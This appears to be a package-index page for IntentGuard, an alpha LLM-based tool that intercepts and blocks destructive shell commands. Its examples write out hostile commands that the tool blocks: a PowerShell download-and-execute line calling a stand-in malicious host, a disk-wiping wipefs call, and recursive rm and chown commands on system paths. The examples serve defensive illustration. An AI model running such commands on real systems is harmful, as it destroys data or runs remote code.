Skip to main content

Agentic AI System That Prevents Costly Digital Mistakes

Project description

IntentGuard

A Pragmatic Agentic Safeguard for Command Line Workflows

IntentGuard is a lightweight, locally-running autonomous agent designed to intercept user actions, reason about underlying intent, and prevent destructive mistakes before they execute. By bringing cognitive reasoning directly to the command line, IntentGuard bridges the gap between raw execution and human intention.

The Agentic Approach to Safety

Traditional safeguards rely on static rules, regex patterns, or strict permissions that are often rigid, easily bypassed, or overly restrictive. IntentGuard takes a more nuanced, agentic approach:

  • Semantic Reasoning: Instead of just checking if you typed rm -rf, the agent evaluates the context—are you deleting a known build directory, or are you accidentally targeting the root filesystem? It understands the subtle difference between routine cleanup and a catastrophic mistake.
  • Unobtrusive Autonomy: IntentGuard runs quietly in the background. It doesn't nag or disrupt your flow for safe, everyday tasks. It only steps in when its reasoning engine determines a high probability of unintended consequences.
  • Context-Aware: The system analyzes the environment, the specific arguments, and the potential blast radius of the command, acting as a highly competent oversight mechanism watching your back.
  • Flexible Intelligence: Because different environments have different security, privacy, and latency needs, IntentGuard is completely model-agnostic. You can power its reasoning engine with anything from a small, strictly offline local model to the most capable cloud APIs available.

Core Capabilities

  • Command Interception: Seamlessly hooks into your workflow to catch potentially destructive actions before they reach the shell.
  • Risk Assessment: Employs advanced LLM reasoning to evaluate both the safety and the true intent of parsed commands.
  • Frictionless Override: When intervention is required, the agent provides clear, actionable explanations of the risk, allowing human operators to confirm or abort with full context.
  • Multi-Provider Support: Plug-and-play support for major LLM providers via LiteLLM for the "brain" of the agent.

Installation

Since IntentGuard is currently in alpha, you can install it locally directly from the source repository:

# Clone the repository (if not already downloaded)
git clone https://github.com/yourusername/intentguard.git
cd intentguard

# Install the agent in editable mode
pip install -e .

# Initialize the configuration
intentguard init

Usage

IntentGuard operates as a background service evaluating commands passed through its execution wrapper.

# Start the IntentGuard background agent
intentguard start

# Execute a command through the agent's reasoning engine
intentguard exec rm -rf /data

When intentguard exec is called, the agent evaluates the target, understands its criticality (e.g., distinguishing a production database volume from a local temporary folder), and will either step back to allow execution or step in to warn you.

Examples in Action

IntentGuard leverages its reasoning engine to analyze the full context of a command, including historical patterns and potential blast radius, to block malicious or highly destructive actions.

Blocking Malicious Payload Downloads

PS D:\> intentguard exec "Invoke-WebRequest -Uri http://malicious.site/payload.ps1 -OutFile $env:TEMP\payload.ps1; Invoke-Expression $env:TEMP\payload.ps1"

IntentGuard blocked this action (Risk: 0.98): Download and execute a suspicious PowerShell script from a potentially malicious site. No rules triggered. | ML Risk: 0.96. Context Anomaly: 0.8. | Based on the historical context and the repeated execution of the same command, there is a high likelihood of this being a malicious activity. The command downloads a PowerShell script from an unknown site and executes it, which is a potential attack vector. Given the previous decisions to block similar commands and the lack of information about the user's intentions, this command should be blocked.

Preventing Critical Destructive Operations

PS D:\> intentguard exec wipefs -a /dev/sda

IntentGuard blocked this action (Risk: 0.96): Attempt to remove all file system signatures from the primary disk. No rules triggered. | ML Risk: 0.96. Context Anomaly: 1.0. | The 'wipefs -a' command with the primary disk as the target has a high risk of causing irreparable damage or data loss. It's a significant indication of an intent to modify the disk's partition table.

Stopping Recursive Deletions in Sensitive Directories

PS D:\> intentguard exec rm -rf /var/log/*

IntentGuard blocked this action (Risk: 0.95): Delete log files in /var/log. Matched recursive force delete context: rm -rf /var/log/* | ML Risk: 0.95. Context Anomaly: 0.52. | User has a history of making critical destructive operations, such as rm -rf /data, rm -rf /, and rm -rf /data1, indicating a pattern of malicious intent. The rm -rf /var/log/* command also has the potential for significant data loss.

Halting System-Wide Privilege Modifications

PS D:\> intentguard exec chown -R nobody:nogroup /

IntentGuard blocked this action (Risk: 0.88): Changing ownership of root directory and all subdirectories to nobody:nogroup. No rules triggered. | ML Risk: 0.88. Context Anomaly: 0.65. | This command has a high risk score due to the use of the recursive chown option (-R) on the root directory (/). Attempting to change ownership of the root directory can lead to critical system instability, potentially requiring a full system reboot or even causing a denial-of-service scenario.

Configuring the Reasoning Engine (LLM Setup)

IntentGuard uses LiteLLM to manage its cognitive backend. This architecture allows you to dynamically swap the "brain" of the agent without changing any local configuration or code. You can use almost any provider—OpenAI, Anthropic, Groq, or a fully local Ollama instance—by setting a few environment variables.

Environment Variable Syntax

  • Linux/macOS (Bash/Zsh): export INTENTGUARD_MODEL="<provider>/<model_name>"
  • Windows (PowerShell): $env:INTENTGUARD_MODEL="<provider>/<model_name>"

OpenAI

Leverage the reasoning capabilities of GPT-4 class models for the most nuanced intent analysis.

# Linux/macOS
export INTENTGUARD_MODEL="gpt-4o"
export INTENTGUARD_API_KEY="sk-..."

# Windows PowerShell
$env:INTENTGUARD_MODEL="gpt-4o"
$env:INTENTGUARD_API_KEY="sk-..."

Anthropic

Claude models often provide excellent deterministic reasoning and code comprehension for evaluating terminal commands.

# Linux/macOS
export INTENTGUARD_MODEL="claude-3-5-sonnet-20240620"
export INTENTGUARD_API_KEY="sk-ant-..."

# Windows PowerShell
$env:INTENTGUARD_MODEL="claude-3-5-sonnet-20240620"
$env:INTENTGUARD_API_KEY="sk-ant-..."

Groq

For environments where latency is the highest priority, Groq's high-speed inference provides near-instantaneous command evaluation, significantly reducing the overhead of interception.

# Linux/macOS
export INTENTGUARD_MODEL="groq/llama3-8b-8192"
export INTENTGUARD_API_KEY="gsk_..."

# Windows PowerShell
$env:INTENTGUARD_MODEL="groq/llama3-8b-8192"
$env:INTENTGUARD_API_KEY="gsk_..."

Fully Local (Ollama)

For highly sensitive environments or air-gapped systems where privacy is paramount, you can run the agent entirely offline using Ollama. This guarantees that no system context or command history ever leaves your machine.

# Linux/macOS
export INTENTGUARD_MODEL="ollama/llama3"
export INTENTGUARD_API_BASE="http://localhost:11434"

# Windows PowerShell
$env:INTENTGUARD_MODEL="ollama/llama3"
$env:INTENTGUARD_API_BASE="http://localhost:11434"

Architecture Overview

At its core, IntentGuard consists of three main components:

  1. The Interceptor: A wrapper that catches commands before they reach the system shell.
  2. The Context Gatherer: Extracts relevant state (e.g., current working directory, environment variables, user privileges) to provide maximum context to the reasoning engine.
  3. The Reasoning Engine: Formats the context into a prompt, interfaces with the configured LLM, and parses the response to make a fast execution decision based on probabilistic reasoning.

By combining these components, IntentGuard achieves a balance between the strict safety of traditional guardrails and the flexible, adaptive capabilities of modern agentic systems.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

intentguard_agent-0.1.0a1.tar.gz (27.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

intentguard_agent-0.1.0a1-py3-none-any.whl (27.6 kB view details)

Uploaded Python 3

File details

Details for the file intentguard_agent-0.1.0a1.tar.gz.

File metadata

  • Download URL: intentguard_agent-0.1.0a1.tar.gz
  • Upload date:
  • Size: 27.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.1

File hashes

Hashes for intentguard_agent-0.1.0a1.tar.gz
Algorithm Hash digest
SHA256 b8b799b9b3dc41ba1f40e9d34dae3ee40ccb7c2a9bcd77f3e91f1c2fd2a38391
MD5 786e4a861d204076fdf600b9d9dd00b1
BLAKE2b-256 905fab9a5b2937fe15fddb8c27ba89b62cbd1e87f3c043c5ea08a0b18818fe76

See more details on using hashes here.

File details

Details for the file intentguard_agent-0.1.0a1-py3-none-any.whl.

File metadata

File hashes

Hashes for intentguard_agent-0.1.0a1-py3-none-any.whl
Algorithm Hash digest
SHA256 cbd67ac05a6c2834842ed4ba94143bab51f8280869fd9831fe2541512edb9852
MD5 aa36e4669d28fa99b593baa21e431f16
BLAKE2b-256 e23392b9fbadec25a6f7674316957c3d20aaefde27b65a488fed6dd26a4664ee

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page